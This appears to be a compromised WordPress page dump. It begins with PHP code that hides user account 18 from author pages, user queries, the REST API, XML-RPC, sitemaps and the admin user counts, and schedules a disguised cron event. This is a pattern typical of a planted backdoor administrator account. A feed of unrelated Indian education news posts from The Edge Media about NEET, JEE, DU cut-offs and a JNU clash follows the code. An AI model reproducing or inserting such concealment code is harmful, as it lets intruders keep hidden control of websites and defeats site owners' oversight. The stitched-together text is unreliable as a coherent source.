add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post Clash Between Students At JNU Due To Non-Vegetarian Mess Foods On Ram Navami appeared first on The Edge Media.
]]>On social media, many reported videos of the assault appeared, one of which showed a student, Akhtarista Ansari, bleeding profusely. Authorities have not verified the videos’ legitimacy. Students of the Akhil Bharatiya Vidyarthi Parishad allegedly barred students from consuming non-vegetarian meals in the dormitory mess and “creating a hostile situation,” according to the JNUSU.
The post Clash Between Students At JNU Due To Non-Vegetarian Mess Foods On Ram Navami appeared first on The Edge Media.
]]>The post First cut-off list for the University of Delhi in 2021: Hansraj College and JMC set the bar at 100% for two disciplines appeared first on The Edge Media.
]]>While Hansraj has set a cutoff of 100 percent in BSc (H) Computer Science and 99.75 percent in BCom (H) and Economics (H), JMC has stated that students seeking admission to Psychology (H) who do not include Psychology in their best of four subjects will need to pass the course with a score of 100 percent. Ramjas College has declared a 100 percent cutoff in three courses: Political Science, Physics, and a BA Program Combination.
The post First cut-off list for the University of Delhi in 2021: Hansraj College and JMC set the bar at 100% for two disciplines appeared first on The Edge Media.
]]>The post Third merit list of FYJC to be declared tommorow appeared first on The Edge Media.
]]>Maharashtra School Education Minister Varsha Gaikwad told about the release of the third FYJC merit list through her twitter handle and the official notice was also released on the website. Prior to this, FYJC Merit list 2021 for two rounds have been released on the official website.
Ms Gaikwad said that the state will ensure no student remains without getting admission in one of the colleges of the state as there are sufficient seats. She said: “The allotment list & cut-off list for the 3rd round will be displayed on Sept 13th. A special round of admissions will later follow. No student will remain without a college. There are sufficient seats.”
Selected students will be required to submit the fees for the allotted college only through online mode because of COVID-10 pandemic. Schedule for the remaining students will be declared later on the official website.
See the tweet here :
The post Third merit list of FYJC to be declared tommorow appeared first on The Edge Media.
]]>The post NTA specifies dress code for NEET UG 2021students appeared first on The Edge Media.
]]>NTA has put a restriction on wearing any type of ornaments like earrings, chains, bracelets, pendants, and other metallic items to the exam hall. Carrying accessories like wallets, goggles, caps and others are also restricted.
NTA has already instructed that there is no provision of any baggage counter at the exam venue so any extra items that a student brings cannot be stored neither can be allowed to carry to the exam hall.
Students will not be allowed to wear light-colored clothes with long sleeves. However, in case of any cultural or customary clothes that candidates wear to the exam center, they are supposed to report at 12:30 pm so that they can be properly frisked without disturbing other students.
Students will not be allowed to wear shoes to the exam center. So they must wear slippers or sandals. NTA has also allowed students to wear sandals with low heels.
NEET UG 2021 is scheduled on September 12. Students appearing for the examination will undergo security checking at the main gate of NEET exam center through hand held metal detectors, temperature check, and other safety protocols to which students will have to cooperate completely.
NEET UG 2021 is scheduled on September 12. Students appearing for the examination will undergo security checking at the main gate of NEET exam center through hand held metal detectors, temperature check, and other safety protocols to which students will have to cooperate completely.
NEET UG exam will be conducted from 2 pm to 5 pm and students will be required to report at least an hour prior to the examination at the center.
The post NTA specifies dress code for NEET UG 2021students appeared first on The Edge Media.
]]>The post NEET PG 2021exam guidelines, check out here appeared first on The Edge Media.
]]>NEET PG 2021 admit cards were released by NBE on September 7 on the official website— natboard.edu.in. Students must read all the details mentioned on the admit card along with the guidelines. Check the exam center and get familiar with the address to avoid any hassle on the day of NEET PG 2021 exam.
Students entering into the NEET PG 2021 exam center will be required to present their admit card and a valid ID proof on the main gate. After scanning the admit card, students will be allotted their lab numbers. Students who fail to carry their admit cards or ID proof will not be allowed to enter the exam hall.
Students will be provided with a face shield, face mask and sanitizer sachets. Also, a temperature check will be conducted while entering the exam center. COVID-19 symptomatic students will be allowed to give tests in a separate isolation lab.
Students can carry their personal sanitizer in a transparent bottle, gloves, face mask and a transparent water bottle to the exam hall. However, students are not allowed to take any eatables inside the exam hall.
Carrying any type of electronic devices like calculator, mobile phone, pen drives is strictly prohibited into the exam hall.
The post NEET PG 2021exam guidelines, check out here appeared first on The Edge Media.
]]>The post NEET PG admit cards to be released soon appeared first on The Edge Media.
]]>NEET PG 2021 will be conducted as an online test for applicants seeking admission to MD, MS or Postgraduate Diploma programmes in all medical colleges, universities in India except AIIMS, PGIMER, NIMHANS, SCTIMST and JIPMER.
To access and download the NEET PG 2021 admit card, students will be required to login with their user IDs and password generated during the registration process. The link to download the NEET PG admit card will be activated at the official site of NBE — nbe.edu.in. Once downloaded, candidates must take a printout of the admit card and carry it on the day of the examination along with a valid ID proof.
The candidates must paste their latest passport size photograph on the NEET PG admit card before reaching the exam centre.
NEET PG 2021 admit card will have mention of the allotted exam centre and its complete address. Candidates will be provided with sanitizer sachets and face masks on the exam centres.
NEET PG admit cards were earlier released for the test scheduled to be held on April 18. However, the admit cards released earlier will now be considered “null and void”.
“Admit Cards issued earlier for examination on 18th April 2021 shall be treated as “null & void”. Fresh admit cards shall be issued on NBEMS website https://nbe.edu.in on 6th September 2021,” an NBE statement added.
The post NEET PG admit cards to be released soon appeared first on The Edge Media.
]]>The post Admit cards for NEET UG expected to be released on September 9 appeared first on The Edge Media.
]]>As per the information provided in NEET 2021 brochure, the admit cards will be made available at the official website of the National Testing Agency(NTA) ‘three days before the examination’.
NEET UG 2021 exam will be conducted on September 12 in a single shift from 2 pm to 5 pm. Students who qualify for the NEET UG 2021 exam will be selected for admission in undergraduate medical and dental programmes at different institutions across the nation.
Meanwhile, NEET PG 2021 admit cards are expected to be released today, September 6, and the examination is slated to be held on September 11.
NEET UG Admit Card 2021: Where, How To Download
– Go to the official NEET 2021 website
– On the homepage, click on the NEET UG admit cards link (Will be displayed once the admit cards are released)
– On the appeared login page, enter the asked credentials
– NEET UG 2021 admit card will be displayed on the screen.
– Save the admit card and take a print out for the future reference
NEET 2021 And Supreme Court :
The Supreme Court on September 6 refused to postpone NEET UG 2021 exam, scheduled for September 12. The top court said it does not want to interfere with the process and it will be “very unfair” to reschedule it.
A bench headed by Justice AM Khanwilkar said if students want to appear in multiple exams, they need to prioritise and make a choice as there may never be a situation where everyone is satisfied with the date of exams.
However, the petitioners will be at liberty to make a representation before the competent authorities on the issue and the same may be decided at the earliest in accordance with the law, the top court said.
The post Admit cards for NEET UG expected to be released on September 9 appeared first on The Edge Media.
]]>The post UGC extends deadline for the submission of thesis for MPhil and PhD appeared first on The Edge Media.
]]>“Considering a large number of requests and also keeping in view the larger interest of the research scholars, the extension given for submission of M.Phil/Ph.D thesis till 31st December, 2021 shall also be applicable to all such students whose due date of submission of M.Phil/Ph.D thesis is on or before 31.12.2021,” the UGC notification read.
“However, tenure of fellowship will remain up to five year only,” the notification added.
The UGC had extended the deadline for the third time.
Initially, the deadline was extended till December 31, 2020, which was again extended to June 30. Now, with the latest announcement, candidates have been allowed to submit their thesis till December 31, 2021.
The post UGC extends deadline for the submission of thesis for MPhil and PhD appeared first on The Edge Media.
]]>The post NTA will soon release the provisional answer key of the last session of JEE Main 2021 appeared first on The Edge Media.
]]>“Only paid challenges made during stipulated time through key challenge link will be considered,” NTA has said adding that the challenges without justification or evidence will not be considered.
The NTA’s decision on the challenges shall be final and no further communication will be entertained,” the Agency has said.
Candidates must note that the NTA will not inform the candidates individually about their challenges. The subject experts will examine all the challenges received and then a final answer key will be displayed and declared.
The JEE Main 2021 result will be compiled on the basis of the final answer key released at jeemain.nta.nic.in.
The NTA will also display the recorded responses and question paper attempted by the candidates at jeemain.nta.nic.in prior to the declaration of JEE Main 2021 result.
JEE Main 2021 Result: Important Points
Candidates’ All India Rank (AIR) will be compiled and declared in this session.
No scorecard will be sent to the candidates individually at their address. Candidates must download their scorecard from the JEE Main website: nta.ac.in or jeemain.nta.nic.in only.
There is no provision for re-valuation or re-checking of the JEE Main 2021 result. No correspondence in this regard will be entertained, the NTA has clarified.
Only the All India Rank (AIR) will be used for admissions through Central Seat Allocation Board (CSAB) or Joint Seat Allocation Authority (JoSAA) to NITs, IIITs, CFTIs, SFIs and others.
All participating institutions that do not use the Centralized Seat Allocation Process will prepare their own ranking based on the performance in JEE Main 2021 and other criteria as decided by them.
The post NTA will soon release the provisional answer key of the last session of JEE Main 2021 appeared first on The Edge Media.
]]>The post JNUEE 2021 application correction window closes today appeared first on The Edge Media.
]]>The JNUEE administering body — National Testing Agency (NTA) — has opened the online JNUEE application correction window on September 1.
“Candidates are requested to undertake the correction(s) very carefully as no further correction in particulars, whatsoever, will be entertained by NTA under any circumstances,” an NTA statement said.
Candidates are also advised to keep visiting the NTA website(s) jnuexams.nta.ac.in, nta.ac.in for any update in this regard,” it added.
JNUEE 2021: How To Make Corrections In The Application Form
Visit the official website – jnuexams.nta.ac.in.
On the homepage, click on the ‘JNUEE 2021 Correction Window’ tab.
Sign in with the credentials — application number and password.
On the JNUEE application form, make the required changes.
Preview and submit.
Download the JNUEE application form for future reference.
As per JNUEE exam dates, JNU admit card 2021 will be made available for download for the candidates on September 8. The JNU entrance test 2021 will be held between September 20 and September 23 in computer-based mode.
The post JNUEE 2021 application correction window closes today appeared first on The Edge Media.
]]>